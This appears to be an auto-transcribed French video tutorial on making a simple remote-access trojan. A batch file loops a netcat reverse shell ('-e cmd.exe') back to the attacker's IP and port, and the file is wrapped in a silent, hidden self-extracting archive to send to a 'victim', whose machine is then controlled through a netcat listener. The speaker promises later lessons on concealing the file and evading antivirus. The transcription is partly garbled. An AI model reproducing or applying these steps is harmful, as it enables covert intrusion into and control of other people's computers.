Nous allons lancer directement avec le contrôle de la machine à distance avec N4. Vous allez d'abord commencer, vous allez d'abord vérifier si les deux machines sont bel et bien connectées, c'est-à-dire la machine virtuelle que moi par exemple j'utilise une machine virtuelle pour faire mes essais. Vous allez essayer si les deux machines sont connectées en vérifiant une connexion en tapant ping sur l'invite de commande de votre machine ping. Un ping, nous allons faire un ping dans la machine distante 0.9. Voilà, vous constatez bel et bien que les réponses, vous voyez bien, réponse de l'adresse telle, le nombre d'octets et le temps mis. Vous voyez que nous n'avons perdu aucune donnée. Ça veut dire bel et bien que les deux sont connectés. Maintenant, nous allons aussi vérifier notre adresse IP. Une fois en tapant IP config, là je sais que mon adresse IP est le 192.168.0.7. Je vais donc venir dans la suite des fichiers qui étaient remis. Vous allez venir dans les fichiers qui vous ont été remis pour le contrôle à distance, c'est-à-dire deux fichiers VBScript, un fichier N4 et le fichier start.bat. Dans le fichier start.bat, vous allez écrire @echo-off, @echo-off, entrée, vous allez écrire un boucle, vous allez aller à la ligne, vous allez taper N4 -e cmd.exe espace, vous allez mettre votre adresse IP c'est pour moi, espace, vous allez taper le port de connexion, c'est-à-dire pour moi je vais mettre 666, vous vais choisir 46, voilà, espace, à la ligne vous allez maintenant rappeler la boucle goto boucle, voilà. Donc cela doit se présenter exactement comme ça, comme le mien se présente là. Une fois vous avez terminé d'écrire votre programme, vous n'avez plus qu'à l'enregistrer, vous fermez, refermez le tout maintenant, c'est-à-dire le fichier N4 que vous avez dans le dossier, tous vous allez tous les rassembler dans le même dossier. Le fichier, vous allez mettre N4 start.bat que vous avez créé, cylinder et launcher VBS que vous avez donné. Vous allez donc revenir archiver ce fichier en fait. Vous allez faire un clic droit, allez ajouter à l'archive, prendre archive SFX. Une fois que vous avez choisi l'archive SFX, vous allez avancer, option SFX, vous allez mettre chemin d'accès, chemin pour l'extraction, vous allez mettre C2 points pour les terreaux. Évidemment, vous pourrez mettre ce que vous voulez. Après l'extraction, vous allez mettre C2 points, le nom du dossier, mettre slash, le nom de votre dossier, moi c'est RAT, voilà, slash, je vais mettre le nom start.bat. Donc c'est un peu le chemin où va se trouver le fichier start.bat que nous plaçons là-bas. Ensuite nous allons aller à mode, nous allons prendre cacher tout sur mode silencieux, nous allons prendre cacher tout, valider OK. Ensuite archivage dans la réponse, je ajoute tout ça, vous faites ce que vous voulez, ça ce que vous voulez. Vous mettez OK. Quand vous placez OK, vous constatez directement que votre archive est créé. Tout ce que vous avez à faire désormais, c'est de copier le fichier archivé et de l'envoyer à la machine cible. Donc je vais copier, je vais l'envoyer. Je mets directement dans mon fichier C.bat, c'est dans le disque C de ma machine virtuelle. Allez, voilà, une fois qu'il est mis là, je vais aller dans ma machine virtuelle et essayer de l'exécuter en fait. Voilà, il lance directement. Et voilà, vous constatez directement que c'est lancé. Dans la machine virtuelle, le fichier est lancé en fait. Là, je reviens dans ma machine. Et voilà. Tout
ce que je vais faire ici. Tout ce que vous allez faire ici, c'est taper N4 espace -dv espace -l espace -p espace. Vous mettez le port que vous avez en fait ajouté sur la machine de la victime. Voilà. Et vous voyez très bien le message qui s'affiche là. Ensuite, vous voyez directement, du coup, je suis connecté à la machine de la victime, quoi. Et voilà. Mais ce que vous allez remarquer en fait, parce que nous avons fait juste une configuration basique, c'est que la victime s'en rend compte à partir de son dos, il voit son dos ouvert, et puis il s'en rend compte de votre intrusion. Ça c'est, mais pour la première fois que nous faisons le tutoriel, nous pouvons parler plus en profondeur. Nous allons d'abord nous arrêter là. Prochainement, nous irons plus en détail. Donc là, vous avez créé le fichier, il a pris le fichier et il l'a mis dans sa machine. Vous revenez maintenant sur votre système, tout ce que vous avez fait. Supposons par exemple que je fais un MD dans la machine, parce que là en fait il a pris le contrôle de la machine distante. Il suffit que je dise à la machine MSG username MSG. Je vais essayer d'appeler, bon, c'est un peu dernier là. Nous allons mettre par exemple, nous allons faire peut-être un start. Si je tape par exemple start sur ma machine, vous voyez bel et bien que l'invite de commande est ouvert dans la machine de la victime. Si jamais dans ma machine je tape echo salut, le message salut envoyé chez moi. Mais en fait tout cela se fait dans la machine. Nous jouons maintenant dans la machine à victime. Nous pouvons taper par exemple MD créer pour essayer de créer un des opérateurs dans la machine à victime. MD Enix. Une fois tapé MD Enix, vous venez, vous vérifiez dans la machine à victime. Vous allez en fait constater que dans le dossier où vous êtes enregistré, le dossier Enix a été créé dans la machine de la victime. Donc vous avez déjà ainsi réussi à prendre contrôle de la machine de la victime. Et tout ce qu'il vous faudra par la suite, c'est de faire en sorte que votre fichier soit déjà non vu par la victime, et ensuite que votre fichier aussi soit encrypté pour éviter les antivirus. Et cela fera évidemment part de nos prochains tutoriels. Et j'espère que ce petit tutoriel déjà pour un début sur N4 vous a intéressé. N'hésitez pas à commenter, à poster, poster aussi les vôtres, et à bientôt.